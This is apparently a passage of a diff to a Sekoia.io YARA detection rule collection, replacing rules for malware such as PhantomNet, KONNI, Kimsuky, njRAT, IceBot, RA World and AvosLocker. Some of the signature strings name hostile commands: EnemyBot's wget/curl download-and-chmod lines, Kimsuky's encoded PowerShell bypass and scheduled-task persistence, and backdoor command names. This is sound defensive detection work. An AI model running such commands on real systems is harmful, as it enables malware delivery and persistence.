-        ?? ?? ?? 48 89 05 ?? ??
-        ?? ?? 48 C7 05 ?? ?? ??
-        ?? ?? ?? 00 00 48 C7 05
-        ?? ?? ?? ?? ?? ?? 00 00 }
+		$ = "').innerHTML;window['" ascii fullword
+		$ = "='at'+'ob';"
+		$ = "]('*','');"
+		$ = "display:none"
+		$ = "0px;\" onerror=\""
+		$ = "'ev'+'"
+		$ = "<!DOCTYPE html PUBLIC"
 
 	condition:
-		pe.is_dll( ) and filesize < 100KB and for any export in pe.export_details : ( $c in ( export.offset..export.offset + 100 ) )
+		5 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Backdoordiplomaty_Phantomnet : FILE
+rule SEKOIA_Loader_Win_Konni_Wpnprv : FILE
 {
 	meta:
-		description = "Detects PhantomNet based on strings"
+		description = "Detect the wpnprv DLLs used for KONNI for UAC bypass"
 		author = "Sekoia.io"
-		id = "bbcc0664-ef2b-47db-a546-b5e0aa2a1e9a"
-		date = "2024-06-06"
+		id = "02162533-4ace-42bf-8df0-38b140487f01"
+		date = "2023-09-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_backdoordiplomaty_phantomnet.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_konni_wpnprv.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e4be9b9e092dcaa368650b7f696ca532f89752bdbe6b5fd09b4285a643c20b86"
+		logic_hash = "32178c97795aeead9c186e0b7fb508376045acb7534e6ce9e617c06fd399c3da"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "memory load plugin failed!" wide
-		$ = "Event eee!!!" ascii
-		$ = "LoadWin32_x64.pdb" ascii
+		$ = "wpnprv.dll"
+		$ = "IIIIIIII" fullword
+		$ = "wusa.exe" wide
+		$ = "winver.exe" wide
+		$ = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$ = "taskmgr.exe" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_12 : FILE
+rule SEKOIA_Apt_Kimsuky_Vbs_Powershell_Downloader : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects VBS/Powershell Downloader used by Kimsuky"
 		author = "Sekoia.io"
-		id = "b69186cf-9825-4d90-be20-7caa9e7de61f"
-		date = "2023-02-03"
+		id = "4c9af11f-802b-4ffe-9783-90fc2ee53809"
+		date = "2022-08-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_12.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_vbs_powershell_downloader.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5c9692337c0dd533c7e49bd3850feedad93b256bc2fba45af6121f50ad83f4cc"
+		logic_hash = "dc24ca206a3122b34be978287f907b12c809f76058fe9355bbd00b3159b0a4d4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255845,27 +256007,25 @@ rule SEKOIA_Generic_Sharpshooter_Payload_12 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ms.Write(ba, 0, (length / 4) * 3);"
-		$ = "var serialized_obj = "
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
-		$ = "var sc ="
+		$ = "& WScript.ScriptFullName &" ascii fullword
+		$ = "/c schtasks /create /sc minute /mo 5 /tn"
+		$ = "pOwErsHeLl -ep bypass -encodedCommand"
 
 	condition:
-		all of them and filesize < 2MB
+		filesize < 200KB and 2 of them
 }
-
-rule SEKOIA_Apt_Muddywater_Moriagent : FILE
+rule SEKOIA_Crimeware_Njrat_Strings : FILE
 {
 	meta:
-		description = "Detects Muddy's Mori Agent implant"
+		description = "Detects njRAT based on some strings"
 		author = "Sekoia.io"
-		id = "e7a83663-6a30-416a-8f29-87a6b9445ea4"
-		date = "2022-01-14"
+		id = "215807ae-fbcb-478d-8941-e0787b883669"
+		date = "2022-08-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_moriagent.yar#L3-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crimeware_njrat_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "21389d4e71e9a19a9d263b8ced740c337ea88ed4ac97199897b0aa3f5914594a"
+		logic_hash = "47102adde81682c3c1c856c3495c6f98a9e39aa052eac2ab0a803dab44d19c26"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255873,99 +256033,87 @@ rule SEKOIA_Apt_Muddywater_Moriagent : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$mut = "0x50504060" ascii fullword
-		$cmd1 = "TType" ascii fullword
-		$cmd2 = "TPath" ascii fullword
-		$cmd3 = "TFileid" ascii fullword
-		$cmd4 = "TCommand" ascii fullword
-		$cmd5 = "TTimeout" ascii fullword
-		$cmd6 = "TFilter" ascii fullword
+		$ = "set cdaudio door closed" wide
+		$ = "set cdaudio door open" wide
+		$ = "ping 0" wide
+		$ = "[endof]" wide
+		$ = "TiGeR-Firewall" wide
+		$ = "NetSnifferCs" wide
+		$ = "IPBlocker" wide
+		$ = "Sandboxie Control" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( ( pe.number_of_exports == 2 and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) ) and ( 5 of them ) )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
 }
-rule SEKOIA_Rat_Lin_Gobrat_2023 : FILE
+
+rule SEKOIA_Icebot_Exported_Function : FILE
 {
 	meta:
-		description = "This rule detect samples that are downloaded on the GobRAT C2 URL path /a, /b and /c."
+		description = "Detects the IceBot RAT used by FIN7 based on the exported function"
 		author = "Sekoia.io"
-		id = "ca36a586-f87f-445f-95dc-52d447c1d2a2"
-		date = "2023-06-09"
+		id = "1a1fb651-6ce3-4751-be23-c27a3d8dabde"
+		date = "2022-01-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_lin_gobrat_2023.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/icebot_exported_function.yar#L4-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b9831cefded9e48ef169aa56c18628a9871760ae613f75b232019b4798944e16"
+		logic_hash = "c029693f555726d28375717fe459ccf4521d2d63fc7053032bbafd60129848f0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "36cb17d9d118bd9692106c8aafab2462aacf1cdad3a6afb0e4f1de898a7db0e1"
-		hash2 = "28a714f7cec4445dbd507b85016c8e96ed5e378bcabe2e422c499975122b3f03"
-		hash3 = "1e80a084ab89da2375bc3cc2f5a37975edff709ef29a3fa2b4df4ccb6d5afe10"
+		hash1 = "5ee5b869689686d9352c73173304627bb424b8d0a8510e6f16726ac84fdec79d"
+		hash2 = "0f76768f65775329d7a0ddb977ea822d992d086ce48a23679cef66e3b4d2f4ed"
+		hash3 = "f06c7f1b91fb2f64e1f38df6eaf2b52a74b16cc958d74c4401fdaf180deb595a"
+		hash4 = "cbed0cf3273ce544a7e4e316d5c8f5e9c9ac6deaefa485a6afad2654fe75ff1e"
 
 	strings:
-		$s1 = "Z:/Go/awesomeProject3/main.go" wide ascii
+		$a = {cc cc cc 48 89 4c 24 ?? 53 55 56 57 41 54 41 55 41 56 41 57 ?? ?? ?? ?? 33 f6 44 8b ee 48 89 74 24 ?? 8b ee 48 89 b4 24 ?? ?? ?? ?? 44 8b f6 48 89 74 24 ?? 44 8b e6 e8 bf ff ff ff 4c 8b f8 8d 5e ?? b8 ?? ?? ?? ?? 66 41 39 07 75 1b 49 63 57 ?? 48 8d 4a ?? 48 81 f9 ?? ?? ?? ?? 77 0a 42 81 3c 3a ?? ?? ?? ?? 74 05 4c 2b fb eb d5 65 48 8b 04 25 ?? ?? ?? ?? bf ?? ?? ?? ?? 4c 89 bc 24 ?? ?? ?? ?? 48 8b 48 ?? 4c 8b 59 ?? 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 84 d5 01 00 00 41 b9 ff ff 00 00 49 8b 53 ?? 48 8b c6 45 0f b7 43 ?? 0f b6 0a c1 c8 ?? 80 f9 ?? 72 04 48 83 c0 ?? 48 03 c1 48 03 d3 66 45 03 c1 75 e5 3d ?? ?? ?? ?? 0f 85 d2 00 00 00 49 8b 53 ?? 41 bb ff ff 00 00 48 63 42 ?? 8b b4 10 ?? ?? ?? ?? 44 8b 54 16 ?? 8b 5c 16 ?? 4c 03 d2 48 03 da 45 33 c9 45 8d 79 ?? 45 8b 02 41 8b c9 4c 03 c2 41 8a 00 4d 03 c7 c1 c9 ?? 0f be c0 03 c8 41 8a 00 84 c0 75 ee 81 f9 ?? ?? ?? ?? 74 10 81 f9 ?? ?? ?? ?? 74 08 81 f9 ?? ?? ?? ?? 75 44 44 8b 4c 16 ?? 44 0f b7 03 4c 03 ca 81 f9 ?? ?? ?? ?? 75 09 47 8b 2c 81 4c 03 ea eb 20 81 f9 ?? ?? ?? ?? 75 09 43 8b 2c 81 48 03 ea eb 0f 81 f9 ?? ?? ?? ?? 75 07 47 8b 34 81 4c 03 f2 66 41 03 fb 45 33 c9 49 83 c2 ?? 48 83 c3 ?? 66 85 ff 0f 85 75 ff ff ff 4c 8b 9c 24 ?? ?? ?? ?? 33 f6 48 89 ac 24 ?? ?? ?? ?? 4c 89 6c 24 ?? e9 8d 00 00 00 3d ?? ?? ?? ?? 0f 85 90 00 00 00 4d 8b 43 ?? 41 bf ?? ?? ?? ?? 41 0f b7 ff bd ff ff 00 00 49 63 40 ?? 42 8b 9c 00 ?? ?? ?? ?? 46 8b 4c 03 ?? 46 8b 54 03 ?? 4d 03 c8 4d 03 d0 41 8b 11 8b ce 49 03 d0 8a 02 49 03 d7 c1 c9 ?? 0f be c0 03 c8 8a 02 84 c0 75 ef 81 f9 ?? ?? ?? ?? 75 16 42 8b 4c 03 ?? 41 0f b7 12 49 03 c8 44 8b 24 91 4d 03 e0 66 03 fd 49 83 c1 ?? 49 83 c2 ?? 66 85 ff 75 ba 48 8b ac 24 ?? ?? ?? ?? 4c 89 64 24 ?? 41 b9 ff ff 00 00 bf ?? ?? ?? ?? 49 8b df 4d 85 ed 74 0f 48 85 ed 74 0a 4d 85 f6 74 05 4d 85 e4 75 14 4d 8b 1b 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 85 39 fe ff ff 4c 8b bc 24 ?? ?? ?? ?? 49 63 6f ?? 33 c9 49 03 ef 89 b4 24 ?? ?? ?? ?? 41 b8 00 ?? ?? ?? 48 89 6c 24 ?? 4c 8b e6 44 8d 49 ?? 8b 55 ?? 41 ff d6 44 0f b7 45 ?? 48 8b f8 44 0f b7 55 ?? 49 83 c0 ?? 4d 85 d2 74 4f 4c 03 c5 41 8b 00 4c 2b d3 45 8b 48 ?? 41 8b 48 ?? 48 03 cf 49 8d 14 07 41 03 c1 89 84 24 ?? ?? ?? ?? 48 8b c1 48 2b c2 4d 85 e4 49 0f 45 c4 4c 8b e0 4d 85 c9 74 0f 8a 02 48 03 d3 88 01 48 03 cb 4c 2b cb 75 f1 49 83 c0 ?? 4d 85 d2 75 b4 8b 85 ?? ?? ?? ?? 41 be ?? ?? ?? ?? 85 c0 0f 84 e8 00 00 00 48 8d 1c 07 8b 43 ?? 85 c0 0f 84 d9 00 00 00 48 8b ac 24 ?? ?? ?? ?? 8b c8 48 03 cf 41 ff d5 44 8b 7b ?? 33 c9 8b 33 4c 03 ff 48 03 f7 4c 8b e8 49 39 0f 74 7d 48 85 f6 74 31 48 39 0e 7d 2c 49 63 45 ?? 0f b7 16 42 8b 8c 28 ?? ?? ?? ?? 42 8b 44 29 ?? 42 8b 4c 29 ?? 48 2b d0 49 03 cd 8b 04 91 49 03 c5 49 89 07 33 c9 eb 2a 4d 8b 37 49 8b cd 49 83 c6 ?? 4c 03 f7 49 8b d6 ff d5 33 c9 49 89 07 41 38 0e 74 0e 8d 41 ?? 41 88 0e 4c 03 f0 41 38 0e 75 f5 49 83 c7 ?? 48 8d 46 ?? 48 85 f6 48 0f 44 c6 48 8b f0 49 39 0f 75 89 41 be ?? ?? ?? ?? 8b 43 ?? 48 03 c7 33 f6 eb 06 40 88 30 49 03 c6 40 38 30 75 f5 8b 43 ?? 48 83 c3 ?? 4c 8b 6c 24 ?? 85 c0 0f 85 3c ff ff ff 48 8b 6c 24 ?? 4c 8b bc 24 ?? ?? ?? ?? 4c 8b cf 4c 2b 4d ?? 39 b5 ?? ?? ?? ?? 0f 84 b5 00 00 00 8b 95 ?? ?? ?? ?? 48 03 d7 8b 42 ?? 85 c0 0f 84 a1 00 00 00 41 bf ?? ?? ?? ?? bb ff ?? ?? ?? 45 8d 6f ?? 44 8b 02 4c 8d 5a ?? 44 8b d0 4c 03 c7 49 83 ea ?? 49 d1 ea 74 62 41 be ?? ?? ?? ?? 41 0f b7 0b 4d 2b d6 0f b7 c1 66 c1 e8 ?? 66 83 f8 ?? 75 09 48 23 cb 4e 01 0c 01 eb 34 66 41 3b c5 75 09 48 23 cb 46 01 0c 01 eb 25 66 41 3b c6 75 11 48 23 cb 49 8b c1 48 c1 e8 ?? 66 42 01 04 01 eb 0e 66 41 3b c7 75 08 48 23 cb 66 46 01 0c 01 4d 03 df 4d 85 d2 75 a7 8b 42 ?? 48 03 d0 8b 42 ?? 85 c0 0f 85 7a ff ff ff 4c 8b bc 24 ?? ?? ?? ?? 44 8d 70 ?? 8b 5d ?? 45 33 c0 33 d2 48 83 c9 ff 48 03 df ff 54 24 ?? e8 21 fb ff ff 4d 85 e4 74 13 48 85 c0 74 0e 4a 8d 0c 20 4c 8b e6 e8 67 00 00 00 eb 3b 8b 94 24 ?? ?? ?? ?? c1 ea ?? 89 b4 24 ?? ?? ?? ?? eb 1d 48 63 84 24 ?? ?? ?? ?? 41 89 34 87 8b 84 24 ?? ?? ?? ?? 41 03 c6 89 84 24 ?? ?? ?? ?? 8b 84 24 ?? ?? ?? ?? 3b c2 72 d8 4c 8b 84 24 ?? ?? ?? ?? ba ?? ?? ?? ?? 48 8b cf ff d3 49 8d 04 3c ?? ?? ?? ?? 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3}
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 4000KB and $s1
+		uint16( 0 ) == 0x5A4D and $a or pe.imphash ( ) == "37af5cd8fc35f39f0815827f7b80b304" or hash.md5 ( pe.rich_signature.clear_data ) == "b857cf76a54ce175c225eaaae66547a2"
 }
-rule SEKOIA_Apt_Toneshell_Shellcode : FILE
+rule SEKOIA_Win_Malware_Janelarat_Strings : FILE
 {
 	meta:
-		description = "Detects first bytes of ToneShell used to call the shellcode or the code to check the MagicNumber (0x17 0x03 0x03)"
+		description = "Detect the JanelaRAT malware"
 		author = "Sekoia.io"
-		id = "5ac8d2e9-dbeb-42f9-8343-1281510d4411"
-		date = "2024-10-02"
+		id = "891f182e-8a7a-4d0c-a481-62c198bb901b"
+		date = "2023-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toneshell_shellcode.yar#L1-L34"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_malware_janelarat_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0e164677681dce2aa75d3621d9f3df1449c3e67a3551817693856d80ccc48eca"
+		hash = "00df0a1f037e24ff1528d524fb7398735e2c3e0a9995a9f95a5293b04748f06e"
+		logic_hash = "cf2ca92cf790211f69ea9645f1c1b865d5503d14a1dcce535b4a69c735ea3dad"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$code = {55 8b ec 83 ec 0c e8 85 00 00 00 6a 00 6a 00 6a 02 6a 00 6a 00 68 00 00 00 10}
-		$MagicNumberParser = {
-        B8 01 00 00 00
-        6B C8 00
-        8B 55 ??
-        0F BE 04 0A
-        83 F8 17
-        75 ??
-        B9 01 00 00 00
-        C1 E1 00
-        8B 55 ??
-        0F BE 04 0A
-        83 F8 03
-        75 ??
-        B9 01 00 00 00
-        D1 E1
-        8B 55 ??
-        0F BE 04 0A
-        83 F8 03
-        }
+		$s2 = {4d 58 4e 4f 42 55 47 4d 41 47}
+		$s1 = "block.blq" wide
 
 	condition:
-		any of them and filesize < 1MB
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 1MB and 2 of them
 }
-rule SEKOIA_Apt_Queueseed : FILE
+rule SEKOIA_Downloader_Win_Search : FILE
 {
 	meta:
-		description = "Detects strings of Queueseed/Kapeka malware"
+		description = "'Search.exe' script used by APT42"
 		author = "Sekoia.io"
-		id = "35f7ffd5-4f6f-4b31-8d60-c713a15d14e8"
-		date = "2024-04-22"
+		id = "8094ddda-6294-4dee-93cb-de79aaed1ec6"
+		date = "2024-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_queueseed.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_search.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "80d1135d63a351cabf45d2266c0ffc770e11669103107cd40caf00eb62c836ed"
+		hash = "a29fa85ecfc0e5554c21f3b9db185de97b3504517403f4aa102adbd2c46dc1bf"
+		hash = "f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060"
+		logic_hash = "1b25f04d1d2c9b7bdc7e0bd17d2f2876c27f9c4acb3a2afca6a4df531e769740"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255973,113 +256121,132 @@ rule SEKOIA_Apt_Queueseed : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {2D 00 6F 00 00 00}
-		$ = {2D 00 62 00 63 00 00 00}
-		$ = {20 00 00 00 00 00 00 00}
-		$ = {20 00 2D 00 77 00 00 00}
-		$ = {35 00 3A 00 20 00 00 00}
-		$ = {34 00 3A 00 20 00 00 00}
-		$ = {33 00 3A 00 20 00 00 00}
-		$ = {32 00 3A 00 20 00 00 00}
-		$ = {31 00 3A 00 20 00 00 00}
-		$ = {50 00 49 00 44 00 20 00 3A 00 20 00 00 00 00 00}
-		$ = "ExitCode : " wide
+		$ = "C:\\Users\\pc\\source\\repos\\Search\\Search\\obj\\Debug\\Search.pdb"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 200KB
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Darkpink_Sample : FILE
+rule SEKOIA_Apt_Apt33_Falsefont : FILE
 {
 	meta:
-		description = "Detects two parts of cmd.exe /c "
+		description = "FalseFont backdoor"
 		author = "Sekoia.io"
-		id = "91b4c64a-7622-4f03-bd3f-9fe56f01dfbe"
-		date = "2023-06-05"
+		id = "d77c1f5b-9898-456f-954a-ac1f0907a2ba"
+		date = "2024-03-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_darkpink_sample.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt33_falsefont.yar#L1-L38"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "8dc3f6179120f03fd6cb2299dbc94425451d84d6852b801a313a39e9df5d9b1a"
-		logic_hash = "c9d3952036bffe2d924ea553fd53f8b6f0b3f16f1060fbde69496c800d4d5ad9"
+		logic_hash = "2eafe15d8e0df1b63b32463c4b44a9dc1d4251d01c15be20e4285c31e75b8348"
 		score = 75
-		quality = 80
+		quality = 53
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cmd_xor_part_1 = {DF 00 A1 00 E4 00 F0 00 4B 00 3A 00 D1 00 C4 00}
-		$cmd_xor_part_2 = {bc 00 cc 00 80 00 d0 00 64 00 59 00 F1 00 E6 00 FD 00 83 00 C6}
+		$s0 = "Agent.Core.WPF"
+		$s1 = "data2.txt" wide fullword
+		$s2 = "data.txt" wide fullword
+		$s3 = "Loginvault.db" wide fullword
+		$command1 = "ExecUseShell" ascii
+		$command2 = "ExecAndKeepAlive" ascii
+		$command3 = "CMD" ascii
+		$command4 = "PowerShell" ascii
+		$command5 = "KillByName" ascii
+		$command6 = "KillById" ascii
+		$command7 = "Download" ascii
+		$command8 = "Upload" ascii
+		$command9 = "Delete" ascii
+		$command10 = "GetDirectories" ascii
+		$command11 = "ChangeTime" ascii
+		$command12 = "SendAllDirectory" ascii
+		$command13 = "UpadateApplication" ascii
+		$command14 = "Restart" ascii
+		$command15 = "GetProcess" ascii
+		$command16 = "SendAllDirectoryWithStartPath" ascii
+		$command17 = "GetDir" ascii
+		$command18 = "GetHard" ascii
+		$command19 = "GetScreen" ascii
+		$command20 = "StopSendScreen" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and 15 of ( $command* ) and 3 of ( $s* )
 }
-
-rule SEKOIA_Apt_Windows_Wip19_Screencap : FILE
+rule SEKOIA_Ransomware_Win_Raworld
 {
 	meta:
-		description = "Detects ScreenCap resource"
+		description = "Detects files related to stage 1 of a campaign from the ransomware group RA World."
 		author = "Sekoia.io"
-		id = "ebf5d2c5-81c9-45c3-aa61-05870f800f6b"
-		date = "2022-10-18"
+		id = "a9ed9c5a-7a0e-4c2e-90f4-d52f5589b2b8"
+		date = "2024-07-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_windows_wip19_screencap.yar#L4-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_raworld.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "02479f0c8199b31f089608da0f44f1487b75790cb31c77bb65ca1fb0fd57ac0d"
+		logic_hash = "583dd2ea8e20a87d0b67783d1dd59212eb133de1f945d5b4afad89e8a5017d35"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = "Loder.exe" ascii fullword
+		$s2 = "Stage2.exe" wide
+		$s3 = "SYSVOL" wide
+		$s4 = "Finish.exe" wide
+		$s5 = "Exclude.exe" wide
+		$s6 = "Stage3.exe" wide
+		$s7 = "Pay.txt" ascii fullword
+		$s8 = "RA World" ascii fullword
+		$s9 = "Stage1.exe" ascii fullword
+
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "89f4d0e3f7f3318270aa9c8345c1402202b1a02ffefc03c7a86636e297aa0ffc" ) and filesize < 2MB
+		4 of them
 }
-rule SEKOIA_Bot_Lin_Enemybot_April22 : FILE
+rule SEKOIA_Ransomware_Win_Avoslocker : FILE
 {
 	meta:
-		description = "Detect enemybot based on command line observed in strings"
+		description = "Detect AvosLocker ransomware (2021-07)"
 		author = "Sekoia.io"
-		id = "5778c653-39ce-4f5d-b10b-1503b74e5041"
-		date = "2022-04-14"
+		id = "fc5c2483-48cb-4282-b6cb-ac728b948607"
+		date = "2021-08-03"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/3xp0rtblog/status/137520616938452173://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_enemybot_april22.yar#L1-L26"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_avoslocker.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "18ea06e60259f8d7d639b0e4659f0f5e166e9589d617f5766c06968af5e56aa6"
+		logic_hash = "d7f14f78ac569011ecf964109c72d75de4942361033a544350a2f73c7af64a0c"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash6 = "f810deb1ba171cea5b595c6d3f816127fb182833f7a08a98de93226d4f6a336f"
+		hash7 = "c0a42741eef72991d9d0ee8b6c0531fc19151457a8b59bdcf7b6373d1fe56e02"
+		hash8 = "84d94c032543e8797a514323b0b8fd8bd69b4183f17351628b13d1464093af2d"
 
 	strings:
-		$cmd0 = "wget http://%s/update.sh" ascii
-		$cmd1 = "busybox wget http://%s/update.sh" ascii
-		$cmd2 = "curl http://%s/update.sh" ascii
-		$cmd3 = "chmod 777 update.sh" ascii
-		$cmd4 = "rm -rf update.sh" ascii
-		$str0 = "ENEMEYBOT" ascii xor
-		$str1 = "KEKSEC" ascii xor
-		$str2 = "/tmp/.pwned" ascii xor
-		$str3 = "echo -e \"\x65\x6e\x65\x6d\x79"
+		$s1 = "cryptopp850\\rijndael_simd.cpp" ascii
+		$s2 = "cryptopp850\\sha_simd.cpp" ascii
+		$s3 = "cryptopp850\\gf2n_simd.cpp" ascii
+		$s4 = "cryptopp850\\sse_simd.cpp" ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f or uint32( 0 ) == 0xfeedfacf ) and ( 4 of ( $cmd* ) or 2 of ( $str* ) )
+		all of them and uint16( 0 ) == 0x5A4D and filesize > 900KB and filesize < 950KB
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_8 : FILE
+rule SEKOIA_Tool_Revsocks_Strings : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects revsocks client"
 		author = "Sekoia.io"
-		id = "e28a1cd3-f7b6-4a55-8229-484e0bbeb7cb"
-		date = "2023-02-03"
+		id = "f5f34e74-0795-4c81-a385-218a8197a0b7"
+		date = "2024-03-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_8.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_revsocks_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "71e4eb41968818e1dd484a259af9eec30a517423b00da75ce21773bf695cbc7d"
+		logic_hash = "f1702aaaebc1ba720f688f0694a69fef55a2556b1f07dd4b846be1ae32ff5529"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256087,26 +256254,27 @@ rule SEKOIA_Generic_Sharpshooter_Payload_8 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Private Function decodeHex(hex)"
-		$ = "Dim serialized_obj"
-		$ = "decodeHex = EL.NodeTypedValue"
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
+		$ = "reverse socks5 server/client by kost" ascii fullword
+		$ = "github.com/kost/"
